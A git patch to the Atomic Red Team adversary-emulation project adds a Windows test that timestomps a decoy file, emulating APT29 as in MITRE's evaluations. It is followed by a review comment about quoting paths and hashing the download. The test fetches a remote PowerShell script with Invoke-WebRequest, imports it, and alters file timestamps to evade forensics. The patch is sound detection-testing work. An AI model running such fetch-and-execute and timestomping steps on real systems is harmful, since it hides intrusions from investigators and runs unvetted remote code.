From 163e84ca30efe419488f887b2fbfaa044cfdf6f1 Mon Sep 17 00:00:00 2001
From: Michael Haag
Date: Tue, 28 Apr 2020 11:36:12 -0600
Subject: [PATCH] Update T1099.yaml - Timestomp (#960)
* Update T1099.yaml
New Timestomp Atomic test added to emulate MITRE ATT&CKs recent APT29 evals.
https://attackevals.mitre.org/APT29
* Generate docs from job=validate_atomics_generate_docs branch=T1099Take2
Co-authored-by: CircleCI Atomic Red Team doc generator
---
 atomics/Indexes/Indexes-CSV/index.csv | 1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv | 1 +
 atomics/Indexes/Indexes-Markdown/index.md | 1 +
 .../Indexes/Indexes-Markdown/windows-index.md | 1 +
 atomics/Indexes/index.yaml | 32 ++++++++++
 atomics/T1099/T1099.md | 64 +++++++++++++++++++
 atomics/T1099/T1099.yaml | 43 +++++++++++++
 7 files changed, 143 insertions(+)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 6aecd180..883344d1 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -258,6 +258,7 @@ defense-evasion,T1099,Timestomp,4,Modify file timestamps using reference file
 defense-evasion,T1099,Timestomp,5,Windows - Modify file creation timestamp with PowerShell
 defense-evasion,T1099,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell
 defense-evasion,T1099,Timestomp,7,Windows - Modify file last access timestamp with PowerShell
+defense-evasion,T1099,Timestomp,8,Windows - Timestomp a File
 defense-evasion,T1127,Trusted Developer Utilities,1,MSBuild Bypass Using Inline Tasks
 defense-evasion,T1102,Web Service,1,Reach out to C2 Pointer URLs via command_prompt
 defense-evasion,T1102,Web Service,2,Reach out to C2 Pointer URLs via powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index f26add6e..924637af 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -116,6 +116,7 @@ defense-evasion,T1216,Signed Script Proxy Execution,3,manage-bde.wsf Signed Scri
 defense-evasion,T1099,Timestomp,5,Windows - Modify file creation timestamp with PowerShell
 defense-evasion,T1099,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell
 defense-evasion,T1099,Timestomp,7,Windows - Modify file last access timestamp with PowerShell
+defense-evasion,T1099,Timestomp,8,Windows - Timestomp a File
 defense-evasion,T1127,Trusted Developer Utilities,1,MSBuild Bypass Using Inline Tasks
 defense-evasion,T1102,Web Service,1,Reach out to C2 Pointer URLs via command_prompt
 defense-evasion,T1102,Web Service,2,Reach out to C2 Pointer URLs via powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 466d5c2e..c441755c 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -390,6 +390,7 @@
 - Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
 - Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
 - Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
+ - Atomic Test #8: Windows - Timestomp a File [windows]
 - [T1127 Trusted Developer Utilities](../../T1127/T1127.md)
 - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
 - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index a1256a62..8c51ccab 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -172,6 +172,7 @@
 - Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
 - Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
 - Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
+ - Atomic Test #8: Windows - Timestomp a File [windows]
 - [T1127 Trusted Developer Utilities](../../T1127/T1127.md)
 - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 4bbcf8c4..602d02b2 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -12852,6 +12852,38 @@ defense-evasion:
 cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
 '
+ - name: Windows - Timestomp a File
+ description: "Timestomp kxwn.lock.\n\nSuccessful execution will include the
+ placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify
+ the time of the .lock file. \n\n[Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml)\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: File path for timestomp payload
+ type: String
+ default: "$env:appdata\\Microsoft"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'timestomp.ps1 must be present in #{file_path}.'
+ prereq_command: 'if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit
+ 1}'
+ get_prereq_command: Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1"
+ -OutFile "#{file_path}\timestomp.ps1"
+ - description: 'kxwn.lock must be present in #{file_path}.'
+ prereq_command: if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else
+ {exit 1}
+ get_prereq_command: 'New-Item -Path #{file_path}\kxwn.lock -ItemType File'
+ executor:
+ name: powershell
+ elevation_required: false
+ command: "import-module #{file_path}\\timestomp.ps1\ntimestomp -dest \"#{file_path}\\kxwn.lock\"\n
+ \n"
+ cleanup_command: |-
+ Write-Host "Removing #{file_path}\timestomp.ps1"
+ Remove-Item #{file_path}\timestomp.ps1 -ErrorAction Ignore
+ Write-Host "Removing #{file_path}\kxwn.lock"
+ Remove-Item #{file_path}\kxwn.lock -ErrorAction Ignore
 T1127:
 technique:
 x_mitre_data_sources:
diff --git a/atomics/T1099/T1099.md b/atomics/T1099/T1099.md
index 51d15941..5d8ef076 100644
--- a/atomics/T1099/T1099.md
+++ b/atomics/T1099/T1099.md
@@ -18,6 +18,8 @@ - [Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell](#atomic-test-7---windows---modify-file-last-access-timestamp-with-powershell) +- [Atomic Test #8 - Windows - Timestomp a File](#atomic-test-8---windows---timestomp-a-file) +
@@ -288,4 +290,66 @@ Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null +
+
+ +## Atomic Test #8 - Windows - Timestomp a File +Timestomp kxwn.lock. + +Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file. + +[Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml) + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| file_path | File path for timestomp payload | String | $env:appdata\Microsoft| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +import-module #{file_path}\timestomp.ps1 +timestomp -dest "#{file_path}\kxwn.lock" +``` + +#### Cleanup Commands: +```powershell +Write-Host "Removing #{file_path}\timestomp.ps1" +Remove-Item #{file_path}\timestomp.ps1 -ErrorAction Ignore +Write-Host "Removing #{file_path}\kxwn.lock" +Remove-Item #{file_path}\kxwn.lock -ErrorAction Ignore +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: timestomp.ps1 must be present in #{file_path}. +##### Check Prereq Commands: +```powershell +if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "#{file_path}\timestomp.ps1" +``` +##### Description: kxwn.lock must be present in #{file_path}. +##### Check Prereq Commands: +```powershell +if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Path #{file_path}\kxwn.lock -ItemType File +``` + + + +
diff --git a/atomics/T1099/T1099.yaml b/atomics/T1099/T1099.yaml
index 5203c215..17b716a3 100644
--- a/atomics/T1099/T1099.yaml
+++ b/atomics/T1099/T1099.yaml
@@ -188,3 +188,46 @@ atomic_tests:
 Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" }
 cleanup_command: |
 Remove-Item #{file_path} -Force -ErrorAction Ignore
+
+- name: Windows - Timestomp a File
+ description: |
+ Timestomp kxwn.lock.
+
+ Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file.
+
+ [Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml)
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: File path for timestomp payload
+ type: String
+ default: $env:appdata\Microsoft
+
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ timestomp.ps1 must be present in #{file_path}.
+ prereq_command: |
+ if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "#{file_path}\timestomp.ps1"
+ - description: |
+ kxwn.lock must be present in #{file_path}.
+ prereq_command: |
+ if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Path #{file_path}\kxwn.lock -ItemType File
+
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ import-module #{file_path}\timestomp.ps1
+ timestomp -dest "#{file_path}\kxwn.lock"
+
+ cleanup_command: |
+ Write-Host "Removing #{file_path}\timestomp.ps1"
+ Remove-Item #{file_path}\timestomp.ps1 -ErrorAction Ignore
+ Write-Host "Removing #{file_path}\kxwn.lock"
+ Remove-Item #{file_path}\kxwn.lock -ErrorAction Ignore
\ No newline at end of file
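Review bot: The first dependency and the executor use the substituted path unquoted (`Test-Path #{file_path}\timestomp.ps1`, `import-module #{file_path}\timestomp.ps1`, and both `Remove-Item` lines in cleanup_command) while the kxwn.lock prereq quotes it (`Test-Path -path "#{file_path}\kxwn.lock"`), so a file_path containing a space is split into extra positional arguments and the unquoted prereq check and the import fail for a value the quoted check accepts. Quote every occurrence, e.g. `if (Test-Path "#{file_path}\timestomp.ps1") {exit 0} else {exit 1}` and `Import-Module "#{file_path}\timestomp.ps1"`. get_prereq_command fetches timestomp.ps1 from a commit-pinned raw.githubusercontent.com URL, but nothing checks what was written to disk before `import-module` executes it; a `Get-FileHash` comparison in prereq_command against a recorded value (`<expected-sha256>`, to be filled in by the maintainers) would make the test fail closed if the downloaded content differs from what was reviewed. The cleanup also drops the `-Force` that the sibling tests pass to `Remove-Item`, and the file now ends without a trailing newline. The enclosing atomic_tests list begins outside the hunk.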